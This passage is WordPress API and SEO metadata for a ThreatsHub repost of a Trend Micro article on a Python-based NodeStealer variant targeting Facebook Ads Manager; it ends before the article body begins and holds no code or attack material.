News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/NodeStealer-thumbnail:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/NodeStealer-thumbnail:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/python-based-nodestealer-version-targets-facebook-ads-manager\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Python-Based NodeStealer Version Targets Facebook Ads Manager\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","og_locale":"en_US","og_type":"article","og_title":"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-12-19T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Python-Based NodeStealer Version Targets Facebook Ads Manager","datePublished":"2024-12-19T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/"},"wordCount":1943,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Malware","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","url":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","name":"Python-Based NodeStealer Version Targets Facebook Ads Manager 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80","datePublished":"2024-12-19T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/NodeStealer-thumbnail:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Python-Based NodeStealer Version Targets Facebook Ads Manager"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57888","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57888"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57888\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57888"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57888"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57888"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":57888,"date":"2024-12-19T00:00:00","date_gmt":"2024-12-19T00:00:00","guid":{"rendered":"urn:uuid:6d380b53-30d1-17da-2558-a878f0b619e3"},"modified":"2024-12-19T00:00:00","modified_gmt":"2024-12-19T00:00:00","slug":"python-based-nodestealer-version-targets-facebook-ads-manager","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/python-based-nodestealer-version-targets-facebook-ads-manager\/","title":{"rendered":"Python-Based NodeStealer Version Targets Facebook Ads Manager"},"content":{"rendered":"